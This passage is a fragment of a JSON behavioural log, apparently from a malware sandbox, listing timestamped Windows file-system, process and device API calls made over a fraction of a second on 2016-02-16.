"timestamp": "2016-02-16 17:41:56,063", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,063", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,073", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,073", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,093", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,093", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,103", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,103", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,103", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,113", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,113", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,113", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,113", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,123", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,133", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,153", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,163", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,173", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,173", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,173", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,183", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,183", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,193", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,193", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,193", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,203", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,223", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,223", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,223", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,223", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,223", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,233", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,233", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,233", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,233", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,233", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,233", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,243", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,253", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,253", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,263", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,263", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,273", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,283", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,283", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,303", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,303", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,313", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,323", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,323", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,323", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,333", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,333", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,333", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,343", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,353", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,363", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 